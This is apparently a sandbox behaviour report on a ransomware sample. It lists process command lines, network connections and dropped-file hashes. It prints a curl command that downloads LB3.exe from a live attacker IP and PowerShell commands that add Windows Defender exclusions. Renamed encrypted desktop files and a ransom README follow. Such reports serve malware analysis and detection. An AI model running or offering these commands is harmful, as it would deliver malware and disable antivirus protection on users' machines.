"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5824,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6236 /prefetch:14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5624,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5848 /prefetch:14
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\1336.tmp >> NUL
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5024,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:14
C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe
"C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8BEF.tmp\8BF0.tmp\8BF1.bat C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe"
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\Downloads\LB3.exe" "http://45.86.155.76/LB3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process powershell -ArgumentList 'Add-MpPreference -ExclusionPath ''C:\Users\Admin\Downloads''; Add-MpPreference -ExclusionProcess ''C:\Users\Admin\Downloads\LB3.exe'' -ErrorAction Stop' -Verb RunAs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads'; Add-MpPreference -ExclusionProcess 'C:\Users\Admin\Downloads\LB3.exe' -ErrorAction Stop
C:\Users\Admin\Downloads\LB3.exe
"C:\Users\Admin\Downloads\LB3.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5908,i,10030018346180334729,18412512000094847350,262144 --variations-seed-version --mojo-platform-channel-handle=6368 /prefetch:14
C:\ProgramData\BDCE.tmp
"C:\ProgramData\BDCE.tmp"
C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
/insertdoc "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\{EA650E29-E080-4423-81F8-BE15EB4ED4C8}.xps" 133893832225680000
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\BDCE.tmp >> NUL
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| US | 8.8.8.8:53 | api.edgeoffer.microsoft.com | udp |
| GB | 88.221.135.9:443 | copilot.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| GB | 88.221.135.9:443 | copilot.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 13.107.246.64:443 | api.edgeoffer.microsoft.com | tcp |
| FR | 45.112.123.126:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| FR | 51.91.7.6:443 | api.gofile.io | tcp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 95.101.143.192:443 | www.bing.com | tcp |
| GB | 95.101.143.192:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | store-na-phx-1.gofile.io | udp |
| US | 8.8.8.8:53 | store-na-phx-1.gofile.io | udp |
| US | 94.139.32.29:443 | store-na-phx-1.gofile.io | tcp |
| US | 94.139.32.29:443 | store-na-phx-1.gofile.io | tcp |
| DE | 45.86.155.76:80 | 45.86.155.76 | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| FR | 45.112.123.126:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-mobile-static.azureedge.net | tcp |
| DE | 45.86.155.76:80 | 45.86.155.76 | tcp |
| GB | 23.73.139.43:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 88.221.135.26:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | f821a5c43f10d9fea226f14443d37b5f |
| SHA1 | 89597bc14fa324dbbff470a051ef965f5072f621 |
| SHA256 | b1acb84957d95ec2e62f13ca354ac1d1f73de0958ab5cb2d4ce2b4c9b92840aa |
| SHA512 | c124c2417f0ec0643e301ac49ca232890deac08947496164a4bae440b1f0a60c92fbc1b94db59e911b0e6b2ad7c51c61a1900194ccec4fb0db77d09a9c287adf |
\??\pipe\crashpad_1128_XMTJQOVPUGELWTNA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0c45ee0655e29b0a935a305e66bba8cf |
| SHA1 | ad52868d94ba826e1f0b9db56d8fb7ff1c8fff2e |
| SHA256 | d23f3010a3dd3688741250e254dd07d508883c099e1911c3e7d0854be85ca599 |
| SHA512 | 479b8d020e5f818a452c050f27488928faed74c6d329ab58befc860f5bf76878efcdd03bd0eb7b83f22afb4e74aa40c7a0d6bb29677cb4cc03ff4dbd2687bb2d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 03b7324925bb39c35d69535ac8321009 |
| SHA1 | 38fa8c840e31c886eaaa8568d0c97be22fe55855 |
| SHA256 | 43f85554862ab36e9f3800e663079a581dbd26b4e6bb5aebbd5f4f490be2ea78 |
| SHA512 | bbeba47ac7a9a94f0a8e7c705e6df628b5c34b51d9184fc2245d856fa345919dea13f2fef2e47046045589d81e651031e9b2905ea8e93127d47cc263f7bd63a3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | f75cf5ed00a6b647ff418d386b6b65b9 |
| SHA1 | 836a3ed9cabcbb70c9d0bc2891f3882b80bd7964 |
| SHA256 | 27e98c36f7a5ae1af3e38bc479d94a2e6b807c14c4991b520e4159331fbb4aa9 |
| SHA512 | 322c5016470ad869151108c15b42e8557a90b6bf423be102c9290f72272df7cb1ef76ddb3f2fbba8394dc9a0f0609152ee85930d5e0ae46612e0376355af43c5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 2b66d93c82a06797cdfd9df96a09e74a |
| SHA1 | 5f7eb526ee8a0c519b5d86c845fea8afd15b0c28 |
| SHA256 | d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954 |
| SHA512 | 95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\Downloads\77821E2FC48F7AD1.exe
| MD5 | f2a312cc2fd4a0fbbbbd494c2486a700 |
| SHA1 | 9e551c7d9781dc6c2f5ad9717aa940e8bc5aa1b4 |
| SHA256 | 9fc236e54d4c03921600abfdf9fe4197a4bf45c3f66b8f8b6d2bee06a9dfce3f |
| SHA512 | ea1f7919246253a0decd91106f006d146e8e9e041de4584d90870d59496f50b88ecd577a17ea8bd882b5a95721d85515074a9e304686fb70218a18375e9a0674 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b076eeac49ab019e35bcb5e3e2ae6e5a |
| SHA1 | 420fe199edcef14e0b032ff87b96d1b9da5fd933 |
| SHA256 | 96c87d88d0ba6c4aea299a1f1dd5d66edef017cb0fcc3c75c26b512df7405bb8 |
| SHA512 | a14936ce26c0aef3d4d9f4088971bce25437851648af81afaaed2c1c2c0a2a377a232e634ad05048f72dcfa34df2a68669657b4c2ce811e55523ec22ae516948 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 847326e96e131808629a641a994291b4 |
| SHA1 | ab47b635fb1965e252ee1dbbaf8d458e0197e24e |
| SHA256 | a3d0c424dcf30a38f4b70f586d6ae2365b46d9e3783ef6336c1eda03aa2967d8 |
| SHA512 | bac2f50bd63bfc069f515de669100ba4aac624cf1eae84a8c4ec0ee5b733e03e0bbc60e5dec3d8089364a95cff035b183e2a1c9d9fdf028cf3d17637707aec38 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
| MD5 | 20d4b8fa017a12a108c87f540836e250 |
| SHA1 | 1ac617fac131262b6d3ce1f52f5907e31d5f6f00 |
| SHA256 | 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d |
| SHA512 | 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856 |
memory/2452-180-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CF37.tmp\CF38.tmp\CF39.bat
| MD5 | 7179ef7f1a0ca3b77a8925d127a8347e |
| SHA1 | a931a94c1df374129fb4811215c94ad481238dea |
| SHA256 | ed11f56ad6a36e58c61222e295ed608944835a2ea93d210dbc0eec9cde4aeeec |
| SHA512 | fd98ee54147ad59a4d38310e17b9c381fd5b754a6cdd56a3393982ae983c3d465445d5e9ef027725641ba5ef4e176e0d09f111f25e2bd64d0e902ba760fe3723 |
memory/2432-184-0x0000025742BF0000-0x0000025742C12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwvzmaje.k4j.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\Downloads\LB3.exe
| MD5 | 0aefd2407315d12f78f637b1e6629d60 |
| SHA1 | d6dc55b998626e70d9d3fce0b521a9376e5d095a |
| SHA256 | 125712fbc5522b61d7b303e241492457a7b4449b1ecd164fe45b0f9a972b1fd2 |
| SHA512 | 92a56eef25c5337ab6592cb125091d80c7a16aff6fc6d004d6fb2a26fa4f08baeacb36f1fd110beb318962d4ae2350cd64ac31bd9e2fc2a022f63cbfa58eb422 |
memory/2452-199-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 88dc70c361a22feac57b031dd9c1f02f |
| SHA1 | a9b4732260c2a323750022a73480f229ce25d46d |
| SHA256 | 43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59 |
| SHA512 | 19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1a11402783a8686e08f8fa987dd07bca |
| SHA1 | 580df3865059f4e2d8be10644590317336d146ce |
| SHA256 | 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0 |
| SHA512 | 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510 |
C:\$Recycle.Bin\S-1-5-21-2627618461-2240074273-3604016983-1000\JJJJJJJJJJJ
| MD5 | 689acd63aad4586ded1d9bfd256563ae |
| SHA1 | 7a6638fd6df1fbfe513544ef173f988d8fe7e02f |
| SHA256 | abb5520e1a4a715706161a871f3ee3649ea69db0587059ae6e7aa8478510b13b |
| SHA512 | bfe87d4572e8fe3a144d03f6259cea8ed5956b89db99065311b87e06c97dcb6ecfba971eae4ce1f90d3d6821f6da8c16c471686c73b434bbf1d5e746b72172ac |
F:\$RECYCLE.BIN\S-1-5-21-2627618461-2240074273-3604016983-1000\DDDDDDDDDDD
| MD5 | d9618c0c6be786c4ba1c9db689a7608d |
| SHA1 | 634931fda7af69e2071804ab0b41326b908924c5 |
| SHA256 | 2be1acc3dd901f6419e15083eabf47c5635b2bce39b00defd152763daa71d85a |
| SHA512 | 2deb7ff4cd0194e8a7aa7a2fc62e485ddf7f43d688107191f2ab10f3468c802f010127d66555abed4b4b4fc3f63bffd9a9895debde59dde245994897d5a66937 |
C:\Users\Admin\h2ux97Q8q.README.txt
| MD5 | 6d3791f20df8a1f087e3e1816a714c70 |
| SHA1 | 92eaa16b96b8de26000d12b56f1b6534ffc329c1 |
| SHA256 | 8d04e3cd50417787b8dfbe310ac0bcee84482c20cc8adf5a29d473337c44e2b4 |
| SHA512 | acfd874bcba0a67e17cbf6ac9df778cd8898b2719adf81499f890d9e85af26a3b55fffee688e1eb3bbda009f279cccd6b4805377cbc5321824c52d594a530bd7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b178b8845cbdbb4158f4c82e1228fd35 |
| SHA1 | cfc3c155eeac38990c4e596ffe541b4067663f8f |
| SHA256 | e74edc15d5a7a2f399b3074dcbf398ea9da7a7ab474affc9d7e1999ca39d81d0 |
| SHA512 | cfd214a9c540c59deb1862149721c6fcd06d627dda5b2cc8c2d954ffbe9261318fefd30191d667a16d67a116d68f99a9bc8410e0d7722edba4ee3e5a28cb241a |
C:\Users\Admin\AppData\Local\Temp\cv_debug.log
| MD5 | 09da1f2cad543596ea956dd713e04557 |
| SHA1 | 0cae660b1f1d593308117f7ef37085d865498d80 |
| SHA256 | 75bc72adb5bfbc6d58ba9b67642f91a131d5fad06bf5839bce689df2f1e0a29e |
| SHA512 | 7543d76ff84730ad08e132d1a72ab7ad5fc22a384036ac25677e8b3e5ebf3a9d2a35fb671c7914f305d84b36ececbefce9c4577d724178e5d649b75956bffb10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 28b5cc6f6b0185b06dc5a4f133ed946c |
| SHA1 | 3ac82d09676cabf70543f93c30fa939e33cb0080 |
| SHA256 | e4c6d7b3636c41678139d709cc8744526f422e4b379ed808d3561b7614e48b95 |
| SHA512 | cfd4ced4b88a9ac3a97ece24d6982ddf080c3acdf764bddb745673a18932e556a7d8b6ca2e41a0112ce862ad8038f7fcc0f636644192ed031179e5492d432796 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe57f721.TMP
| MD5 | cbf0df469d1ddc9e46ad94476022142c |
| SHA1 | e5b0e2f60d34a32599f06dc64ce55f5e11cb16ea |
| SHA256 | 4813140582363c487b6b68f3260ce39a249e8f1e8ca0b59ccc471b110cbe0337 |
| SHA512 | 24d89b1109da2f3182aa945d291c286a79823205dd1da06f6faab79ebccfb58ea13966a2fb74e2d9ad8a4feca4d832f218ddab486161e7c4f8bd0548ab19f1c4 |
C:\ProgramData\1336.tmp
| MD5 | 294e9f64cb1642dd89229fff0592856b |
| SHA1 | 97b148c27f3da29ba7b18d6aee8a0db9102f47c9 |
| SHA256 | 917e115cc403e29b4388e0d175cbfac3e7e40ca1742299fbdb353847db2de7c2 |
| SHA512 | b87d531890bf1577b9b4af41dddb2cdbbfa164cf197bd5987df3a3075983645a3acba443e289b7bfd338422978a104f55298fbfe346872de0895bde44adc89cf |
memory/4508-4052-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4053-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4054-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4051-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4050-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
C:\Users\Admin\Downloads\EEEEEEE
| MD5 | 697e70880c6a0638da7630d954fd3dd2 |
| SHA1 | bb0e2a51a6e2a4cffb45fdd41754c407c9129a93 |
| SHA256 | 348f0e46d67d7104cf5bffbad90348918558bf331d78c0d252849fd5e936edbc |
| SHA512 | d23649757c17838df81af3bab282c59a15fcedf8f63c336de140ae8e1eba337ddb9a0d65b671bd7e262722bcfe089e0d6af1c19bc7294cd6f1e2c0ec5b44a227 |
memory/4508-4083-0x00007FFE6D7D0000-0x00007FFE6D7E0000-memory.dmp
memory/4508-4084-0x00007FFE6D7D0000-0x00007FFE6D7E0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\{53A82260-5322-4F45-8236-EF0C08F9916B}
| MD5 | eb90d717be6eccd9ae8e97cd285ff239 |
| SHA1 | b6431b0c5ecff77c68a4d4597dd67aa52ef765b8 |
| SHA256 | fe9ba6c8c4f0bb7a9344e8786e21bb3c636cf261136735a11bde80c25e92346a |
| SHA512 | 88777c96223ec9eb5e85fd1aebb55535b4fab4a81a61398b4e616b20a09b89782f5b973c1803de6c2d4f6795574c6e0d803b11cd398d927b3bf22ef85f2a8369 |
C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2
| MD5 | 714a1f970b304abab47ea790997d7a37 |
| SHA1 | 834139a502db6a9b1e491b518c7f0b63c4c53646 |
| SHA256 | 7345b1cb837c6bb6aeba035e2baa5a9991de5199cd5a5f5215971445324e13f5 |
| SHA512 | 94276263f3ba33e4a9c64d15890579672bf13c2a8a54d930d9fd30d2f3a24a603a99db85ce9b885710bc4c6eda2cb753db78ac0d1938710acd10599a6cdc6160 |
memory/4508-4144-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4146-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4145-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
memory/4508-4143-0x00007FFE6FED0000-0x00007FFE6FEE0000-memory.dmp
C:\Users\Admin\Desktop\AddStop.emf.h2ux97Q8q
| MD5 | 24f30efe2c75c05d497e87563cfa4a89 |
| SHA1 | 3ae636f992f499c6b53002067298ff39d7f4b7b6 |
| SHA256 | f1312153a23caef7ca161932f11fe8ce80e8ac8aa0d1262cffe55a6d91f6bde4 |
| SHA512 | 15185c2aa1342026acfac0617059d0c9b433120869f4855662242b66b6058c3ee58585b2d6979fc296abb35ccf8f4346a39de60d81926f8940d5f78eef7aeffc |
C:\Users\Admin\Desktop\InitializeGet.jtx.h2ux97Q8q
| MD5 | 6621402c3cf9382b310d3c351530963c |
| SHA1 | 8bf34b44ca42d4efe8f323c417ccd24f045a218c |
| SHA256 | 16680367d5ac2b292d32b6bc9f650119b9f6786cb5c9755cfdc4c657ab86c472 |
| SHA512 | fbd40cacd02478b06896e5089871b0928e8271e594a546db811b36505182a4a854db0f4efa87a4bd65197a316438fd42d1afd4fad60c492fdfc8b6e039c4ab33 |
C:\Users\Admin\Desktop\HideConfirm.wdp.h2ux97Q8q
| MD5 | 8ff9b3fe4df942b2737ad3b40155f80e |
| SHA1 | 3fcf27d1ff21c55f186186dc2a3fd7b4ea480b80 |
| SHA256 | 0368a686a267639e2b23827ce92cf31da55debe2ea7093737336ec3c070977a9 |
| SHA512 | d6e1f68e31023c7cb4250cbcb637149c811dd428a8174d1e419f769c4fdc75553b2235a99ccd37938b70da4b3dd04a079fa02c112d4ab8fb197e55a40f6a54ee |
C:\Users\Admin\Desktop\EnableDeny.m4v.h2ux97Q8q
| MD5 | 9708e824530b10462aae7e4421123c1e |
| SHA1 | 19bad8d8351bf50e1b827abcf6ed58e269b0f4da |
| SHA256 | cd93dc9d19684797afbf33a6bb76695f23d48683500d3480c9bc8f2bf3aebdeb |
| SHA512 | f1f5942a5b7e00be66c7759607b730dd08ecbec508f5e569b46862eebbd8ff07c14e1ffee4e37ec1c2843d797c1cfc6fef1be4492c5ddbaa11383c15c8af6388 |
C:\Users\Admin\Desktop\DisableSubmit.mpv2.h2ux97Q8q
| MD5 | 47a4d0e81b73b5e2228533971baf88e7 |
| SHA1 | 816d099e0d46dd79587740e05e228498f2a110cf |
| SHA256 | a2a480ce597c81ec8c94fc338ed119b1f7413c176d75f25dc99b7e4a9d40e3f7 |
| SHA512 | 2356c0e844827b77b2c0cbd3f6e5d771babf40214c767d8d37c8567a7bc0ba516f6fec1a50717ec190b5a3170f8b0effd59fcfd12b02fb5dac79c053078e9d68 |
C:\Users\Admin\Desktop\DenyProtect.xht.h2ux97Q8q
| MD5 | 4db41961b2210811782d87771841907c |
| SHA1 | 71f34e96527dcb251efb699f29279d605bd10268 |
| SHA256 | b239807873284d11a7b3b7f6f886a830dc8fbf21a63c67f73b99dcfb6cb81c87 |
| SHA512 | f141074d55b092e4adfcc0a8142b53886b2dd0bcccfdd0b02665741f3cd437737ffc840401f2a062a4c84c736f354fa241200c30eb557de2d17e22e433beedb1 |
C:\Users\Admin\Desktop\CompleteAdd.ADTS.h2ux97Q8q
| MD5 | 072abbabd1f63387dcfaeb509bc78074 |
| SHA1 | 9bfc17f881003121f6cf7846494dde768bd99306 |
| SHA256 | 23a7dad525ad31916adf9c32a4e252ea98a1cc5703b462871e4f415819cb2f8e |
| SHA512 | 30b1ed1994f908de718ebf9d42b19cf563840de9bf2977a36c99124a5f74013747534524bfe1d2ee280db2bd77d84c0f9d01db409d17911a31c28af249aaa775 |
C:\Users\Admin\Desktop\CompareDisconnect.wmf.h2ux97Q8q
| MD5 | fc59dd0462d3f4675d628e3029d0de7f |
| SHA1 | fcb96b1589ab44262d1406273643c56e5cc59100 |
| SHA256 | f5086e6394bc277b1665ffb8e669f739850c42b84bd74e35539f5b7ccb6ab6bd |
| SHA512 | edb130ad6b4ed13ff23684e7acf34e45b5ce58c20c40a58bda0258aa38b299b8e86c1bf14081a57ec5377dcca789d376618cbe350d4f6e3c3894f06efebff156 |
C:\Users\Admin\Desktop\BlockPing.xsl.h2ux97Q8q
| MD5 | ccb899cafe0caae5a8550a61a34f4b84 |
| SHA1 | 0865e29e70d8e90de48f8b880ed6808596245d98 |
| SHA256 | d5bb08b221ba024d00934449efdbaa472f4444d3374c86a9d62cc6e64a0dc863 |
| SHA512 | 8cf8bb32ee7d64445dd95139d9e7903301372ab3eb7076143d845e8d8b34ae9005a30a5967af95a3907d4fcf563ecc2d1341555735712e9b60a070bfa42508bd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 7dd5e75750f8a47f64523dbb0f53efc1 |
| SHA1 | aeb9a0508c42ee8c271447dfe27d38408727ac0c |
| SHA256 | 6d92dc97e335270d0ed2859713d0a0d72fc1a2a0cc6da2a382b7b6f16c2af703 |
| SHA512 | a74d80404d2649286c3c9711d7eb029b14e87360fa51dd26537cfc7ae07a0f81fdf4d61c375ce2812708c7b044bcba4fc0546099642cecf9a1ac96fd244422f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | b15bbe4e4fe5655d824496fc09f18f5e |
| SHA1 | e6a6198dfe5f6ca6b57b64d51cdc002b0a3eb51e |
| SHA256 | b5c8b303788bf967b2a607c81ec60dbcb801136c2331ddda82bd7335f73b5695 |
| SHA512 | f463dd10249a0128b0f215cdca102953a5a66e0a5f2e4deebdf2be6409c52af58cccab58e381c851cb20f05eca2593c4bbb447352f31c4f6456d790bc56d22d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog
| MD5 | 93f627b6817340fd4df30adc89ed5008 |
| SHA1 | 778635ea68eb2e8cafa8e0bc10ae973d3c3ca7c7 |
| SHA256 | e37221521507dd0776b7a4b6b775c3ff4d02d4e267fa438f9ef3c53445105534 |
| SHA512 | 7401df38e1d3a24c6640eafc66648983b6463009e7bd365cd21e561dadda4622489384f6dbbc24168266add9534cbb6ccafe20bc8c5cb969126c8ec1d09b54f3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig
| MD5 | 3f8927c365639daa9b2c270898e3cf9d |
| SHA1 | c8da31c97c56671c910d28010f754319f1d90fa6 |
| SHA256 | fc80d48a732def35ab6168d8fd957a6f13f3c912d7f9baf960c17249e4a9a1f2 |
| SHA512 | d75b93f30989428883cb5e76f6125b09f565414cf45d59053527db48c6cf2ac7f54ed9e8f6a713c855cd5d89531145592ef27048cf1c0f63d7434cfb669dbd72 |
memory/5216-4199-0x0000000000400000-0x000000000041D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | a4f258f290eba67d7c45ce0eb2b603e1 |
| SHA1 | 2e32c347825a924f870c02458fcc4c60dc6bce83 |
